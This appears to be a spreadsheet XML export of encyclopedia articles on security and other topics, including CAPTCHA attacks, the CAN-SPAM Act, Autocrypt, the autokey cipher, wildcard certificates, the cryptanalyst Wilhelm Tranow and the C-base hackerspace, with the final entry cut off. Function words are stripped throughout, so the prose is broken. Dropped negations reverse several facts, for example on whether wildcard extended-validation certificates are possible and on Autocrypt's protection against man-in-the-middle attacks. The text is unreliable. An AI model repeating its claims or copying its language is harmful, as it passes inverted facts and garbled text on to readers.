designed captcha systems: some captcha protection systems bypassed without using simply reusing session known captcha image captchas residing shared servers also present problem; security issue another virtual host leave captcha issuer's site vulnerablesometimes, part software generating captcha client-side (the validation done server text user required identify rendered client side), users modify client display un-rendered text. some captcha systems hashes stored client-side, leave captcha vulnerable brute-force attack. notable attacks some notable attacks various captchas schemas include: mori published paper ieee cvpr'03 detailing method defeating popular captchas, ez-gimpy, tested accurate defeating method also shown defeat complex less-widely deployed gimpy program time. however, existence implementations algorithm actual indeterminate time. pwntcha made significant progress defeating commonly used captchas, contributed general migration towards sophisticated captchas. podec, trojan discovered security company kaspersky, forwards captcha requests online human translation service converts image text, fooling system. podec targets android mobile devices. alternative captchas schemas with demonstration text distortion based captchas vulnerable machine learning based attacks, researchers proposed alternatives including image recognition captchas require users identify simple objects images presented. argument favor schemes tasks like object recognition typically complex perform text recognition therefore resilient machine learning based attacks. here notable alternative captcha schemas: chew published work international information security conference, isc'04, proposing three different versions image recognition captchas, validating proposal user studies. suggested versions, anomaly captcha, best 100% human users able pass anomaly captcha least probability seconds. datta published paper multimedia conference, named imagination (image generation internet authentication), proposing systematic image recognition captchas. images distorted state-of-the-art image recognition approaches (which potential attack technologies) fail recognize them. microsoft (jeremy elson, john douceur, howell, jared saul) claim developed animal species image recognition restricting access (asirra) users distinguish cats dogs. microsoft beta version websites use. they claim "asirra easy users; solved humans 99.6% time seconds. anecdotally, users seemed find experience using asirra much enjoyable text-based captcha." this solution described 2007 paper proceedings 14th conference computer communications security (ccs). however, project closed october 2014 longer available. also defense strategy (computing) nucaptcha proof-of-work system recaptcha references further references ahn, blum langford. (2004) "telling humans computers apart (automatically)". communications acm, 47(2):57–60. external links captcha curlie verification human loop, identification turing test, moni naor, 1996. inaccessibility captcha: alternatives visual turing tests web, working group note. captcha history parc. reverse engineering captchas abram hindle, michael godfrey, richard holt, 2009-08-24</t>
  </si>
  <si>
    <t>CAN-SPAM Act of 2003</t>
  </si>
  <si>
    <t>controlling assault non-solicited pornography marketing (can-spam) 2003 passed 2003 establishing united states' first national standards sending commercial e-mail. requires federal trade commission (ftc) enforce provisions. introduced republican conrad burns, passed house senate 108th united states congress signed president george bush december 2003. history backronym can-spam derives bill's full name: controlling assault non-solicited pornography marketing 2003. plays word "canning" (putting spam, usual term unsolicited email type. bill sponsored congress senators conrad burns wyden. can-spam occasionally referred critics "you-can-spam" bill fails prohibit many types e-mail spam preempts state laws would otherwise provided victims practical means redress. particular, require e-mailers permission send marketing messages. also prevents states enacting stronger anti-spam protections, prohibits individuals receive spam suing spammers except laws specific e-mail. largely unenforced, despite letter senator burns, noted "enforcement regarding can-spam legislation." 2004, less spam complied can-spam 2003.the required report back congress within months effectiveness act. changes recommended. also requires promulgate rules shield consumers unwanted mobile phone spam. december 2005 reported volume spam begun level off, enhanced anti-spam technologies, less reaching consumer inboxes. significant decrease sexually explicit e-mail also reported.later modifications changed original can-spam 2003 adding definition term "person"; modifying term "sender"; clarifying sender comply including post office private mailbox; clarifying submit valid opt-out request, recipient cannot required fee, provide information email address opt-out preferences, take steps sending reply email message visiting single page internet website. mechanics can-spam applicability can-spam, direct response growing number complaints spam e-mails, defines "commercial electronic mail message" "any electronic mail message primary purpose commercial advertisement promotion commercial product service (including content internet website operated commercial purpose)." exempts "transactional relationship messages." issued final rules 316) clarifying phrase "primary purpose" december 2004. previous state laws used bulk number threshold), content (commercial), unsolicited define spam. explicit restriction commercial e-mails widely considered industry essentially exempt purely political religious e-mail specific requirements. such non-commercial messages also stronger first amendment protection, shown jaynes commonwealth.congress determined government showing increased interest regulation commercial electronic mail nationally, send commercial e-mails mislead recipients source content them, recipients emails right decline them. however, can-spam spam emailing outright, imposes laws using deceptive marketing methods headings "materially false misleading". addition conditions email marketers must meet terms format, content, labeling. three basic types compliance defined can-spam act—unsubscribe, content, sending behavior follows: unsubscribe compliance visible operable unsubscribe mechanism present emails. consumer opt-out requests honored within business days. opt-out lists also known suppression lists used compliance purposes. content compliance accurate "from" lines relevant subject lines (relative offer body content deceptive) legitimate physical address publisher advertiser present. addresses acceptable compliance 316.2 email sent third party, legitimate physical address entity, whose products services promoted email visible. label present content adult. sending behavior compliance message cannot sent without unsubscribe option. message cannot contain false header message contain least sentence. message cannot null. unsubscribe option message.there restrictions company emailing existing customers anyone inquired products services, even individuals given permission, messages classified "relationship" messages can-spam. sending unsolicited commercial emails, must stated email advertisement marketing solicitation. note recipients signed receive commercial messages exempt rule. user opts out, sender days cease sending email address compliance purposes. legislation also prohibits sale transfer e-mail address opt-out request. also requires unsubscribe mechanism must able process opt-out requests least days transmission original message.use automated means register multiple e-mail accounts send spam compound violations. prohibits sending sexually oriented spam without label later determined "sexually explicit." this label replaced similar state labeling requirements "adv:adlt" "adlt." can-spam makes misdemeanor send spam falsified header information. host common spamming practices make can-spam violation "aggravated offense," including harvesting, dictionary attacks, address spoofing, hijacking computers trojan horses worms, using open mail relays purpose sending spam. criminal offenses although according law, legitimate businesses marketers conscientious regarding aspects mentioned above, misinterpretations fraudulent practices viewed criminal offenses: sending multiple spam emails hijacked computer sending multiple emails internet protocol addresses sender represents falsely his/her property trying disguise source email deceive recipients regarding origins emails, routing computers sending multiple spam emails multiple mailings falsified information header using various email accounts obtained falsifying account registration information, order send multiple spam emails. private right action can-spam provides limited private right action internet access services adversely affected receipt emails violate act; allow natural persons bring suit. can-spam plaintiff must satisfy higher standard proof compared government agencies enforcing act; thus, private plaintiff must demonstrate defendant either sent email issue paid another person send knowing sender would violate act. despite heightened standard, private can-spam lawsuits cropped around country, plaintiffs seek take advantage statutory damages available act. overriding state anti-spam laws can-spam preempts (supersedes) state anti-spam laws deal false deceptive activity. relevant portion can-spam reads: this chapter supersedes statute, regulation, rule state political subdivision state expressly regulates electronic mail send commercial messages, except extent statute, regulation, rule prohibits falsity deception portion commercial electronic mail message information attached thereto.though move criticized anti-spam activists, legal commentators praised citing heavily punitive california seen broad wave allegedly dubious suits filed utah. can-spam can-spam allows implement national do-not-email list similar ftc's popular national call registry telemarketing, report back congress creation list currently feasible. soundly rejected proposal, list implemented. concluded lack authentication email would undermine list, could raise security concerns. legislation prohibits e-mail recipients suing spammers filing class-action lawsuits. allows enforcement ftc, state attorneys general, internet service providers, federal agencies special categories spammers (such banks). individual might able (s)he mail server, would likely cost-prohibitive would necessarily hold court. individuals also using state laws fraud, virginia's gives standing based actual damages, effect limiting enforcement isps. mccain amendment made businesses promoted spam subject penalties enforcement remedies, knew known business promoted spam. this amendment designed close loophole allowed running affiliate programs allow spammers abuse programs, encouraged businesses assist identifying spammers. senator corzine sponsored amendment allow bounties informants. limited bounties individuals inside information. bounties expected $100,000 none awarded yet. reaction those opposing spam greeted dismay disappointment, almost immediately dubbing "you spam" act. internet activists work stop spam stated would prevent spam fact, appeared give federal approval practice, feared spam would increase result law. cauce (coalition against unsolicited commercial email) stated: this legislation fails fundamental test anti-spam law, neglects actually tell marketers spam. instead, gives marketer united states free shot consumer's e-mail inbox, force companies continue deploy costly disruptive anti-spam technologies block advertising messages reaching employees company time using company resources. also fails learn experiences states countries tried "opt-out" legal frameworks, marketers must asked stop, avail. executive vice president general counsel randall stated: [can-spam] empowered help spam, also spammers well. actions today clearly demonstrate can-spam alive kicking we're using give hardcore, outlaw spammers boot. advertising organizations data marketing association (dma) sought weaken implementation various ways. these include lengthening time honoring opt-outs business days calendar days, limiting validity opt-out requests three years, eliminating rewards persons assist federal trade commission enforcement act. also opposed provisions requiring subject line spam indicate message advertisement. criminal enforcement february 2005, anthony greco, cheektowaga, york, first person arrested can-spam 2003. after pleading guilty, sentenced closed session.within months, hundreds lawsuits filed alliance isps. many efforts resulted settlements; still pending. though defendants "john does," many spam operations, scott richter's, known. april 2004, united states government brought first criminal civil charges act. criminal charges filed united states attorney eastern district michigan, filed civil enforcement action northern district illinois. defendants company, phoenix avatar, four associated individuals: daniel lin, james lin, mark sadek, christopher chung west bloomfield, michigan. defendants charged sending hundreds thousands spam emails advertising "diet patch" "hormone products." stated products effectively worthless. authorities said face five years prison anti-spam years prison u.s. mail fraud statutes. september 2004, nicholas tombros pled guilty charges became first spammer convicted can-spam 2003. sentenced july 2007 three years probation, months house arrest, fine $10,000.on april 2006, mounir balarbi, tangier, morocco, first person outside united states arrest warrant validated can-spam 2003. mounir's trial held absentia, sentenced closed session.on january 2006, jeffrey goodin, azusa, california, convicted jury united states district court angeles united states goodin, u.s. district court, central district california, 06-110, can-spam (the first conviction act), june 2007, sentenced months federal prison. potential sentence years, prosecutors asked sentence months. goodin already detained custody, missed court hearing.as late 2006, can-spam ignored spammers. review spam levels october 2006 estimated email messages spam, number spam emails complying requirements estimated 0.27% spam emails. 2010, email spam.on august 2005, three people indicted counts fraud count criminal conspiracy. march 2006 jennifer clason, raymond, hampshire, pled guilty sentenced june 2006. faced maximum sentence years three counts agreed forfeit money received commission crimes. june 2007, remaining convicted spamming millions e-mail messages included hardcore pornographic images. jeffrey kilbride, venice, california, james schaffer, paradise valley, arizona, convicted eight counts u.s. district court phoenix, arizona. both sentenced five years prison, ordered forfeit $1,300,000. charges included conspiracy, fraud, money laundering, transportation obscene materials. trial, began june first include charges can-spam 2003, according department justice. specific prosecutors used can-spam designed crack transmission pornography spam. men, andrew ellifson, scottsdale, arizona, kirk rogers, manhattan beach, california, also pled guilty charges can-spam related spamming operation. both scheduled sentenced june 2006 phoenix. after sentencing, ellifson received presidential pardon president obama. civil enforcement july 2005, federal trade commission lodged civil can-spam complaints nine companies alleging responsible spam emails sent affiliates. eight nine companies, cyberheat tucson, arizona, entertainment, inc., davie, florida, media, inc., bingham farms, michigan, pure marketing solutions, llc, tampa, florida, productions, llc, tampa, florida, bangbros.com, inc., netmedia, inc., ideas, inc., llc, miami, florida entered stipulated consent decrees. impulse media group, inc. seattle, washington, represented carpelaw pllc, defended case brought it.the department justice asserted can-spam statute imposed strict-liability producers impulse media actions non-agent, independent-contractor affiliates. however, courts consider argument rejected doj's contention. march 2008 remaining defendant, impulse media group, went trial. trial, determined img's affiliate agreement specifically prohibited spam bulk-email affiliate violated agreement, would terminated program. fact, several affiliates terminated reason. after trial, jury retired determine whether impulse media held liable acts affiliates. three one-half hours later, jury returned verdict liable emails fault affiliates.in march 2006, obtained largest settlement date—a $900,000 consent decree jumpstart technologies, numerous alleged violations can-spam act. however, never prevailed trial theory strict liability. also communications 1934 (pub.l. 73–416) do-not-call implementation 2003 (pub.l. 108–10 (text) (pdf)) email spam general data protection regulation junk prevention 2005 (pub.l. 109–21 (text) (pdf)) spamming suppression list email spam legislation country references notes lee, younghwa (june 2005). "the can-spam act: silver bullet solution?". communications acm, 131–132. citations external links full text can-spam html format can-spam policy can-spam act: compliance guide cybertelecom spam hearing spam effects small business (october 2003), house representatives, committee small business, subcommittee regulatory reform oversight</t>
  </si>
  <si>
    <t>Autocrypt</t>
  </si>
  <si>
    <t>autocrypt cryptographic protocol email clients aiming simplify exchange enabling encryption. version autocrypt specification released december 2017 makes attempt protect mitm attacks. implemented openpgp replacing complex management fully automated unsecured exchange cryptographic keys peers. method autocrypt-capable email clients transparently negotiate encryption capabilities preferences exchange keys users alongside sending regular emails. this done including material encryption preferences header email, allows encrypting message contact previously sent user email. this information signed verified even actual message encrypted verified.no support required email providers preserving manipulating autocrypt specific header fields.when message encrypted group receivers, keys also automatically sent receivers group. this ensures reply message encrypted without complications work user. security model autocrypt guided idea opportunistic security 7435 implementing something much less secure trust first (tofu) model. encryption messages autocrypt-capable clients enabled without need user interaction. traditional openpgp applications display noticeable warning keys verified either manually trust method use. contrast, autocrypt completely resigns kind verification. exchange initial handshake valid invalid keys peers replaced anytime later without user interaction verification. this makes easy exchange key(s) user loses access also makes protocol much susceptible man-in-the-middle attacks clean tofu. underlying openpgp implementation makes often possible user perform manual band verification, however design users never alerted autocrypt changed keys peers.autocrypt tries maximize possible opportunities encryption, aggressive encrypting messages possible opportunities. instead, encryption enabled default communicating parties consent, allowing users make available encrypted communication without getting established workflows.man-in-the-middle attacks preventable security model, controversial.any attacker send emails forged sender-address cause encryption keys replaced keys choice and/or deliberately turn encryption. technical details autocrypt uses established openpgp specification underlying data format. messages encrypted using keys, recommended length 3072 bits. these mechanisms chosen maximum compatibility existing openpgp implementations. there plans moving smaller elliptic-curve keys support widely available. support kontact since version 21.04. longer functional: thunderbird extension enigmail since version 2.0. delta chat messenger version 0.9.2. mail android mail-app support since version 5.400 (reportedly broken version 5.717). longer functional: autocrypt extension thunderbird.the german email provider posteo also supports autocrypt, additionally cryptographically signing outbound autocrypt metadata dkim. popular free email client thunderbird refuses adopt standard whole approach fully automated email encryption. further reading autocrypt bertram, linda dooble, gunther (eds.): nomenclatura: encyclopedia modern cryptography internet security from autocrypt exponential encryption zero-knowledge-proof keys, 2019, isbn 9783746066684. openpgp transformation cryptography: fundamental concepts encryption exponential encryption: beyond cryptographic routing external links autocrypt website (engl.) autocrypt spezifikation (engl.) bundesmann, april 2018), "autocrypt automatisiert e-mail-kryptografie", heise select german), vol. 2018, 64–66, retrieved april 2018 "einfache mail-verschlüsselung: pgp-helfer autocrypt version vorgestellt" german). retrieved april 2018. references</t>
  </si>
  <si>
    <t>CAESAR Competition</t>
  </si>
  <si>
    <t>competition authenticated encryption: security, applicability, robustness (caesar) competition organized group international cryptologic researcher encourage design authenticated encryption schemes. competition announced early symmetric crypto workshop january 2013 final portfolio february 2019. cases final caesar portfolio organized three cases: lightweight applications (resource constrained environments) high-performance applications defense depth final portfolio final portfolio announced caesar committee caesar committee committee charge caesar competition consisted steve babbage (vodafone group, daniel bernstein (university illinois chicago, usa, technische universiteit eindhoven, netherlands); secretary, non-voting alex biryukov (university luxembourg, luxembourg) anne canteaut (inria paris-rocquencourt, france) carlos (royal holloway, university london, joan daemen (stmicroelectronics, belgium) dunkelman (university haifa, israel) henri gilbert (anssi, france) tetsu iwata (nagoya university, japan) stefan lucks (bauhaus-universität weimar, germany) willi meier (fhnw, switzerland) bart preneel (cosic, leuven, belgium) vincent rijmen leuven, belgium) matt robshaw (impinj, usa) phillip rogaway (university california davis, usa) greg rose (kitchen4140, usa) serge vaudenay (epfl, switzerland) hongjun (nanyang technological university, singapore) references external links homepage project</t>
  </si>
  <si>
    <t>Autokey cipher</t>
  </si>
  <si>
    <t>autokey cipher (also known autoclave cipher) cipher incorporates message (the plaintext) key. generated message automated fashion, sometimes selecting certain letters text commonly, adding short primer front message. there forms autokey cipher: key-autokey text-autokey ciphers. key-autokey cipher uses previous members keystream determine next element keystream. text-autokey uses previous message text determine next element keystream. modern cryptography, self-synchronising stream ciphers autokey ciphers. history this cipher invented 1586 blaise vigenère reciprocal table alphabets. vigenère's version used agreed-upon letter alphabet primer, making writing letter rest message.more popular autokeys tabula recta, square copies alphabet, first line starting 'a', next line starting etc. instead single letter, short agreed-upon keyword used, generated writing primer rest message, vigenère's version. encrypt plaintext, first letter message column first letter located. letter column cross ciphertext letter. method autokey cipher, used members american cryptogram association, starts relatively-short keyword, primer, appends message example, keyword queenly message attack dawn, would queenlyattackatdawn. plaintext: attackatdawn key: queenlyattackatdawn ciphertext: qnxepvytwtwp ciphertext message would thus "qnxepvytwtwp". decrypt message, recipient would start writing agreed-upon keyword. qnxepvytwtwp queenly first letter key, would taken, would found tabula recta. that column first letter ciphertext would looked across, also case, letter would retrieved, now, letter would added key: qnxepvytwtwp queenlya then, since next letter next letter ciphertext looked across find retrieve qnxepvytwtwp queenlyat that continues entire reconstructed, primer removed start. with vigenère's autokey cipher, single mistake encryption renders rest message unintelligible. cryptanalysis autokey ciphers somewhat secure polyalphabetic ciphers fixed keys since repeat within single message. therefore, methods like kasiski examination index coincidence analysis work ciphertext, unlike similar ciphers single repeated key.a crucial weakness system, however, plaintext part key. that means likely contain common words various points. attacked using dictionary common words, bigrams, trigrams etc. attempting decryption message moving word potentially-readable text appears. consider example message meet fountain encrypted primer keyword kilt: start, autokey would constructed placing primer front message: plaintext: meetatthefountain primer: kilt autokey: kiltmeetatthefoun message encrypted using substitution alphabets, tabula recta: plaintext: meetatthefountain key: kiltmeetatthefoun ciphertext: wmpmmxxaeyhbryoca attacker receives ciphertext attack text selecting word likely appear plaintext. example, attacker selects word potential part original message attempts decode placing every possible location key: ciphertext: key: plaintext: ciphertext: key: plaintext: ciphertext: key: plaintext: case, resulting plaintext appears almost random aligned ciphertext. however, examining results suggest locations properly aligned. cases, resulting decrypted text potentially part word. example, highly unlikely start original plaintext highly unlikely either first three letters the. examining results, number fragments possibly words seen others eliminated. then, plaintext fragments sorted order likelihood: unlikely ←——————————————————→ promising correct plaintext fragment also going appear key, shifted right length keyword. similarly, guessed fragment (the) also appears plaintext shifted left. thus, guessing keyword lengths (probably 12), plaintext revealed. trying oun, possibly wasting time others, results following: shift ciphertext: wmpmmxxaeyhbryoca key: ......eta.the.oun plaintext: ......the.oun.ain shift ciphertext: wmpmmxxaeyhbryoca key: .....eqw..the..ou plaintext: .....the..oun..og shift ciphertext: wmpmmxxaeyhbryoca key: ....tqt...the...o plaintext: ....the...oun...m shift seen look good (both others unlikely revealed shifted back plaintext: ciphertext: wmpmmxxaeyhbryoca key: ..ltm.eta.the.oun plaintext: ..eta.the.oun.ain worked now. keyword probably characters long (..lt), message visible: m.eta.the.oun.ain because plaintext guesses effect characters left, feedback correct incorrect guesses given. gaps quickly filled meetatthefountain ease cryptanalysis caused feedback relationship plaintext key. three-character guess reveals characters (three side), reveal characters, creating cascade effect. that allows incorrect guesses ruled quickly. also chaocipher cipher block chaining notes references external links secret code breaker autokey cipher decoder encoder javascript implementation autokey cipher</t>
  </si>
  <si>
    <t>Automated quality control of meteorological observations</t>
  </si>
  <si>
    <t>meteorological observation given place inaccurate variety reasons, hardware defect. quality control help spot meteorological observations inaccurate. main automated quality control programs used today area meteorological observations meteorological assimilation data ingest system (madis). history weather observation quality control systems verify probability, history, trends. main simplest forms quality control check probability. this check throws impossible observations, point higher temperature data outside acceptable ranges, temperatures degrees fahrenheit. another basic quality control check data compared preset geographic extremes, perhaps combined diurnal variations. however flags data uncertain station could reporting correctly know. better correlate previous observations well simple checks. this method uses hour persistence check quality current observation. this method makes continuity observations better since system able make better judgments whether current observations not. current systems madis three-pronged approach quality control. this approach much better mainly information compare current observation first part process limit check. already described program checks whether observation within predetermined limits according whether physically exist not. second part temporal check compares station closest surrounding stations. third part internal checking, compares observation previous ones sees whether makes sense not. also takes account present weather conditions data considered system fair weather. each madis' quality control checks organized three different levels. level validity tests, level internal checks also statistical spatial tests level three spatial test. level statistical spatial test tests whether station failed quality control check time previous seven days. once happened station continue fail improves failing time. spatial check madis program also uses reanalysis procedure: large difference station checked station checked against, wrong. instead assuming station checked wrong, program moves stations near checked. station checked still compared stations surrounding flagged bad. however station close ones except assumed bad. references</t>
  </si>
  <si>
    <t>William Blair (surgeon)</t>
  </si>
  <si>
    <t>william blair january 1766 december 1822) english surgeon interest ciphers stenography. known also contributing articles rees's cyclopædia. biography william blair born 1766 lavenham, suffolk. youngest william blair, m.d., wife gideon. qualified surgical practice london pearson golden square, introduced london lock hospital, vacancy arose given position surgeon charity. blair m.a. known graduated. became eminent profession, surgeon asylum, finsbury dispensary, bloomsbury dispensary relief sick poor great russell street, female penitentiary cumming house, pentonville, rupture society.he member royal college surgeons, london, medical societies london, paris, brussels, aberdeen. time editor london medical review magazine. blair keen methodist, worked cause british foreign bible society, presented valuable collection rare curious editions bible, many scarce commentaries different languages. attempted lectures anatomy subjects, little success. wife's death march 1822 resolved give professional practice, retire country. took house neighbourhood colchester, preparations removing completed seized illness, died residence great russell street, bloomsbury december 1822.william blair's portrait painted presented bloomsbury dispensary henry meyer. ciphers stenography blair greatly interested ciphers stenography, wrote articles subject rees's cyclopædia. david kahn, work code breakers (1967), characterized blair's "superb article" "the finest treatise english cryptology" parker hitt's military manual published u.s. army 1916. blair's article ciphers american edition cyclopedia digitized linked website beale ciphers. works soldier's friend, containing familiar instructions loyal volunteers, yeomanry corps, military general, preservation recovery health, 1798 essays venereal disease concomitant effects, 1798, anthropology, natural history man, comparative view structure functions animated beings general, 1805 vaccine contest, exact outline arguments adduced principal combatants sides respecting cow-pox inoculation, including late official report medical council royal jennerian society, 1806 hints consideration parliament letter jenner supposed failure vaccination ringwood, including report royal jennerian society, also remarks prevalent abuse variolous inoculation, exposure out-patients attending small-pox hospital, 1808 prostitutes reclaimed penitents protected, answer objections female penitentiary, 1809 strictures hale's reply pamphlets lately published defence london penitentiary, 1809 pastor deacon examined, remarks rev. john thomas's appeal vindication hale's character, opposition female penitentiaries, 1810 correspondence formation, objects, plan roman catholic bible society, 1814 revival popery, intolerant character, political tendency, encroaching demands, unceasing usurpations, letters william wilberforce, 1819 alphabet fifteen letters, including vowels,’ william harding's ‘universal stenography edit. 1824. letters method secret writing, containing original letters subject right hon. windham, canning, earl harrowby, symmons paddington, michael gage swaffham, whole system ciphers, sold dispersal william upcott's collection 1846.for rees's cyclopædia contributed articles surgery well cipher, (1807) stenography, (1816) references attribution this article incorporates text publication public domain: cooper, thompson (1886). "blair, william (1766-1822)". stephen, leslie (ed.). dictionary national biography. vol. london: smith, elder</t>
  </si>
  <si>
    <t>Wilhelm Tranow</t>
  </si>
  <si>
    <t>wilhelm tranow (born 1891) successful german cryptanalyst, world worked monitoring service german navy responsible breaking number encrypted radio communication systems, particularly naval cypher, used british admiralty encrypting operational signals naval code encrypting administrative signals. tranow considered important cryptanalysts b-service. described experienced energetic. little known personal life, born, died. american historian david kahn underscored war-historical significance cryptography cryptanalysis success tranow, citing anonymous source: german intelligence ever held keys victory world wilhelm tranow. life wilhelm tranow initially worked radio technician aboard battleship pommern. 1914, received coded message, watch, cruiser breslau forwarded fleet command, reported could read tranow, interested codes cryptology, broke encipherment coded messages forwarded broken message back fleet showing lack urgency understanding, fleet issued tranow stern warning keep away secret matters, instead trying improve code.during latter part world tranow placed naval (imperial german navy) intercept code-breaking organization (german: nachrichten-abteilung) (german naval intelligence service) neumünster. there participated solving (cryptography) british navy 3-letter code. with loss treaty versailles, code-breaking unit neumünster shut down. april 1919, agency created berlin, eight former cryptographers, tranow them.in late 1919, tranow reconstructed britain's enormous government telegraph code used admiralty carry reports warships. later 1920s used broken code enable germans track british gunboat activity yangtze.in 1927, tranow started work french naval codes, working tous bâtiments militaires/maritimes bâtiments guerre. from early 1932 started work code signaux tactiques provide insight french tactics.in 1932, followed movements british convoy atlantic, breaking current 4-letter naval code. these early successes gradually growing strength unit, called b-dienst (german: beobachtungsdienst). late 1930s, french exercises could read.in mid-1935, adolf hitler, still considered britain potential ally, ordered whole naval staff redirect operational readiness planning france ordered main code breaking effort b-dienst transfer france. kriegsmarine, considered major potential opponent britain, viewed order suspicion. tranow, laughed heard order, stated: want delve high policy, want thing: know english report worldwide ship movements codes. suppose mediterranean fleet pours straits gibraltar, moves atlantic, channel even north sea. don't want know advance?the kriegsmarine reconsidered position allowed tranow continue, violation hitler's order. september 1935, tranow assistants made major advance breaking royal navy's widely used code, 5-digit naval code (german code name: münchen (munich)), using method comparing routes merchant vessel, published lloyds weekly shipping reports (lloyd's register), coded reports.tranow's growing influence increasing importance specialty ensured rise within b-dienst eventually, sometime 1936 charged running complete cryptanalyst section, even though nazi.at start war, tranow knew locations major fleet forces. september 1939 bore immediate fruit b-dienst read british message indicated assembly points convoy. this enabled kriegsmarine dispatch u-boat u-31 torpedo steamer aviemore september 1939.during march 1940, tranow team penetrated british merchant navy code. month later royal naval administrative cipher also broken.tranow started working naval cypher 1938 spring 1940, tranow's work british naval cypher progressed sufficiently well, b-dienst able read everything importance lead operation stratford messages revealing plans anglo-french expedition norway cover name operation stratford. germany seized initiative invaded norway april 1940. code read concurrently campaign. exact data british counter-measures landing fields, arrival transports harstad known advance, enabling german armed forces take appropriate action. breaking cypher enabled tranow read bulk british naval traffic august 1940, british naval cipher (german code name: köln (cologne)) (naval cypher) introduced. from september 1941, tranow reconstructed codebook naval cipher 2.on february 1942, b-dienst cryptanalyst team broke 4-digit us-british-canadian convoy cipher, naval cipher (german code name: frankfurt). around time, kriegsmarine introduced 4-wheel version enigma immediately rendered naval enigma unreadable government code cypher school (gc&amp;cs) bletchley park staff later 1942, tranow compromised british allied merchants ships code (bams). march 1942, capture naval cipher codebook merchant vessel northern waters enabled tranow make limited penetrations british naval cipher october 1942. introduction naval cipher june 1943, later introduction unbreakable typex cipher machines november 1943, ensured tranow b-dienst team could longer penetrate allied ciphers.after war, wilhelm tranow high value individual picked allied ticom organization interrogated flensburg ticom team 24–25 1945. during 1950, wilhelm tranow working deutsche presse-agentur (english: german press agency). notes bibliography bauer, friedrich (2007). decrypted secrets: methods maxims cryptology (4th, revised extended ed.). berlin: springer. isbn 978-3-540-24502-5. bonatz, heinz (1981). seekrieg äther: leistungen marine-funkaufklärung 1939–1945 [naval warfare ether: achievements german naval radio intelligence 1939–1945] german). herford: verlag mittler sohn. isbn 978-3-8132-0120-8. kahn, david (2012) [1991]. seizing enigma: race break german u-boat codes 1939–1943. annapolis, maryland: naval institute press. isbn 978-1-59114-807-4. wrixon, fred (1998). codes, ciphers other cryptic clandestine communication: making breaking secret messages hieroglyphs internet. york, black leventhal publishers. isbn 9781579120405.</t>
  </si>
  <si>
    <t>Wildcard certificate</t>
  </si>
  <si>
    <t>computer networking, wildcard certificate public certificate used multiple sub-domains domain. principal securing sites https, also applications many fields. compared conventional certificates, wildcard certificate cheaper convenient certificate sub-domain. multi-domain wildcard certificates simplify complexity reduce costs securing multiple domains sub-domains. example single wildcard certificate https://*.example.com secure subdomains https://*.example.com domain: payment.example.com contact.example.com login-secure.example.com www.example.cominstead getting separate certificates subdomains, single certificate main domains subdomains reduce cost.because wildcard covers level subdomains (the asterisk match full stops), domains would valid certificate: test.login.example.comthe "naked" domain valid added separately subject alternative name (subjectaltname): example.comnote possible exceptions cas, example wildcard-plus cert digicert contains automatic "plus" property naked domain example.com. type wildcard certificates wildcard certificates categorized basis validation level, number domain number servers used with. likewise named domain validation wildcard certificate, organisation validation wildcard certificate extended validation wildcard certificate categorize according validation level. name multi-domain wildcard certificates multi-server wildcard certificates given according number domain number server. types wildcard certificates signed popular categorized listed internet. therefore types wildcard secure multiple domains, multiple servers provide different levels validation. limitations only single level subdomain matching supported accordance 2818.it possible wildcard extended validation certificate. workaround could every virtual host name subject alternative name (san) extension, major problem certificate needs reissued whenever virtual server added. (see transport layer security support name-based virtual servers information.) wildcards added domains multi-domain certificates unified communications certificates (ucc). addition, wildcards subjectaltname extensions, including wildcards. example, wildcard certificate *.wikipedia.org *.m.wikimedia.org subject alternative name. thus secures www.wikipedia.org well completely different website name meta.m.wikimedia.org.rfc 6125 argues wildcard certificates security grounds, particular "partial wildcards". examples wildcard applies level domain name. label.label.label.tld*.domain.com match www.domain.com domain.com zzz.www.domain.comthe wildcard appear anywhere inside label "partial wildcard" according early specifications f*.domain.com match frog.domain.com frog.super.domain.combaz*.example.net matches baz1.example.net *baz.example.net matches foobaz.example.net b*z.example.net matches buzz.example.nethowever, "partial-wildcard" certs recommended. 2011, partial wildcard support optional, explicitly disallowed subjectaltname headers required multi-name certificates. major browsers deliberately removed support partial-wildcard certificates; result "ssl_error_bad_cert_domain" error. similarly, typical standard libraries programming languages support "partial-wildcard" certificates. example, "partial-wildcard" certificate work latest versions python thus, allow label consists entirely wildcard unless left-most label sub1.*.domain.com allowed.a cert multiple wildcards name allowed. *.*.domain.coma cert plus top-level domain allowed. *.comtoo general allowed. *international domain names encoded ascii (a-label) labels ascii-encoded begin xn--. allow wildcards international label. xn--caf-dma.com café.com xn--caf-dma*.com allowed lw*.xn--caf-dma.com allowed references relevant rfcs "rfc 2595 using imap, pop3 acap". internet engineering task force. june 1999. "rfc 2818 http over tls". internet engineering task force. 2000. "rfc 6125 representation verification domain-based application service identity within internet public infrastructure using x.509 (pkix) certificates context transport layer security (tls)". internet engineering task force. march 2011.</t>
  </si>
  <si>
    <t>C-base</t>
  </si>
  <si>
    <t>c-base e.v. non-profit association located berlin, germany. purpose increase knowledge skills pertaining computer software, hardware data networks. association engaged numerous related activities. example, society stands large festivals, children's day, introduce young people topics like robotics computer-aided design. association's headquarters, c-base station, also used initiatives groups around berlin event location function rooms, example wireless community network freifunk.net, chaos computer club berlin wikipedia group. group identifies purpose c-base also welcome premises meetings events. history seventeen people founded c-base autumn 1995. years 2002 2003 berlinbackbone project launched make available promote free public access internet wireless community networks. also 2003 c-base association began staging weekly meetings musicians, called cosmic open stage, thus providing platform well known unknown musicians hold sessions give concerts. since 2004 premises c-base association also used cooperation transmediale. c-base recognized first hackerspaces world. along loft diego, metalab, directly influenced creation hackerspaces activities apart main purpose c-base association members also engaged many activities, example jugger, rules supposedly gained analysis files c-beam, main computer c-base station. once year, @c-terra, event organised c-base association, gives overview activities offered. premises c-base association host different events (parties, presentations, theatrical performances, concerts exhibitions), cosmic open stage. c-base society also present events chaos computer club like chaos communication congress chaos communication camp. from september 14–16, 2006 fourth wizards conference held cooperation c-base. mythological self-image c-base location c-base accompanied myth. this myth says remnants space station called c-base underneath city centre berlin. space station's antenna fernsehturm berlin, large spire mirrored ball near distinctive landmark nearby. history space station according stories members c-base, space station crashed unstable conditions orbit exiting time warp. time number highly technological advanced heretofore undiscovered lifeforms aboard station. much evidence existence said around berlin, including aforementioned antenna, (according stories) unmasked east german soviet scientists. other evidence, multifunctional space station module, ejected crash, intense research makes current premises c-base association. there currently printed edition collected knowledge space station, known "space almanack" (ger.: allmanach). project, called "c-pedia", currently underway, attempting make knowledge available internet. there also reconstruction station artifacts taking place. structure c-base c-base system seven concentric rings move relation another. each ring considered single module special functions. rings called (from centre out) "core", "com", "culture", "creactiv", "cience", "carbon" "clamp". inner ring, core, provides nonterminating supply energy produced möbius strip generator. central computer c-base, "c-beam", also located 